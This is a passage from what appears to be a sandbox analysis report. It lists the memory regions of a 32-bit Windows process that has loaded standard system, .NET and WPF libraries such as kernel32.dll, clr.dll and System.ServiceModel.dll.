0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 665 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 666 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 667 start_va = 0x540000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 668 start_va = 0x6d360000 end_va = 0x6d3b8fff monitored = 1 entry_point = 0x6d370780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 669 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 670 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 671 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 672 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 673 start_va = 0x420000 end_va = 0x4ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 674 start_va = 0x540000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 675 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 676 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 677 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 678 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 679 start_va = 0x4e0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 680 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 681 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 682 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 683 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 684 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 685 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 686 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 687 start_va = 0x6d290000 end_va = 0x6d308fff monitored = 1 entry_point = 0x6d29f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 688 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 689 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 690 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 691 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 692 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 693 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 694 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 695 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 696 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 697 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 698 start_va = 0xae0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 699 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 700 start_va = 0x6d3d0000 end_va = 0x6d3d7fff monitored = 0 entry_point = 0x6d3d17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 701 start_va = 0x6bf00000 end_va = 0x6c5b0fff monitored = 1 entry_point = 0x6bf15d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 702 start_va = 0x6d190000 end_va = 0x6d284fff monitored = 0 entry_point = 0x6d1e4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 703 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 704 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 705 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 706 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 707 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 708 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 709 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 711 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 712 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 713 start_va = 0x1ee0000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 714 start_va = 0x1ee0000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 715 start_va = 0x2080000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 716 start_va = 0x1ee0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 717 start_va = 0x1f70000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 718 start_va = 0x1f80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 719 start_va = 0x1f20000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 720 start_va = 0x2090000 end_va = 0x408ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 721 start_va = 0x4090000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 722 start_va = 0x1f20000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 723 start_va = 0x4130000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 724 start_va = 0x4230000 end_va = 0x4566fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 725 start_va = 0x6acd0000 end_va = 0x6bef7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 726 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 727 start_va = 0x4570000 end_va = 0x4600fff monitored = 0 entry_point = 0x45a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 728 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 729 start_va = 0x6a320000 end_va = 0x6accbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 730 start_va = 0x69c00000 end_va = 0x6a311fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 731 start_va = 0x4570000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 732 start_va = 0x6d110000 end_va = 0x6d18dfff monitored = 1 entry_point = 0x6d111140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 733 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 734 start_va = 0x4580000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 735 start_va = 0x690a0000 end_va = 0x69bfbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "presentationcore.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\453066eba7980c1ec9a76f27291d3285\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\453066eba7980c1ec9a76f27291d3285\\presentationcore.ni.dll") Region: id = 736 start_va = 0x70410000 end_va = 0x70422fff monitored = 0 entry_point = 0x70419950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 737 start_va = 0x703e0000 end_va = 0x7040efff monitored = 0 entry_point = 0x703f95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 738 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 739 start_va = 0x67e20000 end_va = 0x69097fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "presentationframework.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\0af50700201d066842a881f90e679009\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\0af50700201d066842a881f90e679009\\presentationframework.ni.dll") Region: id = 740 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 741 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 742 start_va = 0x67a50000 end_va = 0x67e17fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "windowsbase.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\d31693d2e7ad7a9d698064f574cd5f06\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\d31693d2e7ad7a9d698064f574cd5f06\\windowsbase.ni.dll") Region: id = 743 start_va = 0x6d4e0000 end_va = 0x6d6d0fff monitored = 0 entry_point = 0x6d5c3cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 744 start_va = 0x6cf70000 end_va = 0x6d10efff monitored = 1 entry_point = 0x6cfd4792 region_type = mapped_file name = "wpfgfx_v0400.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\wpfgfx_v0400.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wpf\\wpfgfx_v0400.dll") Region: id = 745 start_va = 0x6cea0000 end_va = 0x6cf60fff monitored = 1 entry_point = 0x6cec5293 region_type = mapped_file name = "presentationnative_v0400.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\PresentationNative_v0400.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wpf\\presentationnative_v0400.dll") Region: id = 746 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 747 start_va = 0x45a0000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 748 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 749 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 750 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 751 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 752 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 753 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 754 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 755 start_va = 0x4590000 end_va = 0x4590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004590000" filename = "" Region: id = 756 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 757 start_va = 0x45a0000 end_va = 0x45a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 758 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 759 start_va = 0x45a0000 end_va = 0x45a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 760 start_va = 0x45a0000 end_va = 0x45a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 761 start_va = 0x45a0000 end_va = 0x45a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 762 start_va = 0x515c0000 end_va = 0x51ba7fff monitored = 1 entry_point = 0x51b930d6 region_type = mapped_file name = "system.servicemodel.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.ServiceModel.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.servicemodel\\v4.0_4.0.0.0__b77a5c561934e089\\system.servicemodel.dll") Region: id = 763 start_va = 0x45a0000 end_va = 0x4b87fff monitored = 1 entry_point = 0x4b730d6 region_type = mapped_file name = "system.servicemodel.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.ServiceModel.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.servicemodel\\v4.0_4.0.0.0__b77a5c561934e089\\system.servicemodel.dll") Region: id = 764 start_va = 0x4b90000 end_va = 0x4bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 765 start_va = 0x4bd0000 end_va = 0x4bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 766 start_va = 0x4be0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 767 start_va = 0x4bf0000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 768 start_va = 0x4c00000 end_va = 0x4c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 769 start_va = 0x4c10000 end_va = 0x4c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 770 start_va = 0x4c10000 end_va = 0x4c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 771 start_va = 0x6ce80000 end_va = 0x6ce9dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\607f34b8be4f2014b99872617699b357\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\607f34b8be4f2014b99872617699b357\\smdiagnostics.ni.dll") Region: id = 772 start_va = 0x4c10000 end_va = 0x4c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 773 start_va = 0x4c20000 end_va = 0x4c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 774 start_va = 0x4c20000 end_va = 0x4c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 775 start_va = 0x50ea0000 end_va = 0x50fa3fff monitored = 1 entry_point = 0x50f9f3aa region_type = mapped_file name = "system.identitymodel.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.IdentityModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.IdentityModel.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.identitymodel\\v4.0_4.0.0.0__b77a5c561934e089\\system.identitymodel.dll") Region: id = 776 start_va = 0x4c20000 end_va = 0x4d23fff monitored = 1 entry_point = 0x4d1f3aa region_type = mapped_file name = "system.identitymodel.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.IdentityModel\\v4.0_4.0.0.0__b77a5c561934e089\\System.IdentityModel.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.identitymodel\\v4.0_4.0.0.0__b77a5c561934e089\\system.identitymodel.dll") Region: id = 777 start_va = 0x4d30000 end_va = 0x4d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 778 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 779 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 780 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 781 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 782 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 783 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 784 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 785 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 786 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 787 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 788 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 789 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 790 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 791 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 792 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 793 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 794 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 795 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 796 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 797 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 798 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 799 start_va = 0x677a0000 end_va = 0x67a47fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\system.runtime.serialization.ni.dll") Region: id = 800 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 801 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 802 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 803 